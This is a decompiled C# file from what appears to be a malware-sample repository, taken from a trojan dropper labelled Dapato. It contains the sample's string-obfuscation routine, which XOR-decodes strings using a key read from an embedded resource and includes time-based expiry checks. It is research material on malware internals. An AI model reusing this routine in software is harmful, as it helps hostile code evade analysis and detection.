MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.bfdc-b8ca4f2cda6f49778d6840b2eff24c49fe4212060200c667d42e2986a9ec3a86/.cs

54 lines
1.7 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: App, Version=6.11.5.1, Culture=neutral, PublicKeyToken=null
// MVID: 843578DF-6576-45E1-B6A2-485233E8A253
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.bfdc-b8ca4f2cda6f49778d6840b2eff24c49fe4212060200c667d42e2986a9ec3a86.exe
using System;
using System.IO;
using System.Reflection;
internal sealed class \uE008
{
public static string \uE000(string _param0, int _param1)
{
if (DateTime.Now > new DateTime(634748065894698000L))
throw new Exception();
return string.Intern(\uE008.\uE001.\uE000.\uE000(_param0, _param1));
}
public static string \uE000 => "b04a440ecec501b0";
private sealed class \uE001
{
public static readonly \uE008.\uE001 \uE000;
private byte[] \uE001;
static \uE001()
{
if (DateTime.Now > new DateTime(634748065894074000L))
throw new Exception();
\uE008.\uE001.\uE000 = new \uE008.\uE001();
}
private \uE001()
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\uE008.\uE000);
if (manifestResourceStream == null)
return;
this.\uE001 = new byte[256];
manifestResourceStream.Read(this.\uE001, 0, this.\uE001.Length);
}
public string \uE000(string _param1, int _param2)
{
int length = _param1.Length;
int index = _param2 & (int) byte.MaxValue;
char[] charArray = _param1.ToCharArray();
while (--length >= 0)
charArray[length] = (char) ((uint) charArray[length] ^ ((uint) this.\uE001[index] | (uint) _param2));
return string.Intern(new string(charArray));
}
}
}